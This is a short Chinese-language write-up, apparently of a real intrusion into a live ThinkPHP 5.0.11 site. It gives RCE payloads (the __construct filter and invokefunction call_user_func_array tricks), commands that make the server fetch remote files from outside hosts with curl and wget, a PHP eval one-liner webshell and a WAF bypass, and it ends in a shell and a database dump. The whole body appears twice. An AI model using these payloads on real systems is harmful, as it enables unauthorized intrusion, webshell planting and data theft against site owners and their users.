超级签名
首先看见是tp5.0.11,直接用exp打
然后准备用rce,但是发现了禁了一些函数,
此外,有waf,过滤了eval,assert,有点头疼
此外,还尝试很多payload,都没有打成功,
_method=__construct&filter[]=system&method=get&get[]=phpinfo
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
然后准备用0组的payload打
http://www.0-sec.org/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js 结果发现curl不管用,然后换用wget,结果还是报错了
然后将admin这个模块换为user,index都没有用,captcha,也没用用,最后用了一个portal这个模块,就能打了,附上payload
http://518.jd12558.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=exec&vars[l][]=wget%20https://dl.4y9011.cn/static/upload/images/chatImg/2020-07-06/fw.php
然后因为有waf,就不贴图了,什么情况呢,phpinfo能够执行,但是普通的一句话连接不上,然后我们看到他会转移,转义成这样
<?php @eval($_POST['cai']);?> 然后就是这这样构造去写小马,
\<\?php eval(\$\_POST\[cai\]); 还是连不上
然后就换了一个php7过waf的马
然后就连上了
拿下shell,连裤
然后准备用rce,但是发现了禁了一些函数,
此外,有waf,过滤了eval,assert,有点头疼
此外,还尝试很多payload,都没有打成功,
_method=__construct&filter[]=system&method=get&get[]=phpinfo
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
然后准备用0组的payload打
http://www.0-sec.org/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js 结果发现curl不管用,然后换用wget,结果还是报错了
然后将admin这个模块换为user,index都没有用,captcha,也没用用,最后用了一个portal这个模块,就能打了,附上payload
http://518.jd12558.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=exec&vars[l][]=wget%20https://dl.4y9011.cn/static/upload/images/chatImg/2020-07-06/fw.php
然后因为有waf,就不贴图了,什么情况呢,phpinfo能够执行,但是普通的一句话连接不上,然后我们看到他会转移,转义成这样
<?php @eval($_POST['cai']);?> 然后就是这这样构造去写小马,
\<\?php eval(\$\_POST\[cai\]); 还是连不上
然后就换了一个php7过waf的马
然后就连上了
拿下shell,连裤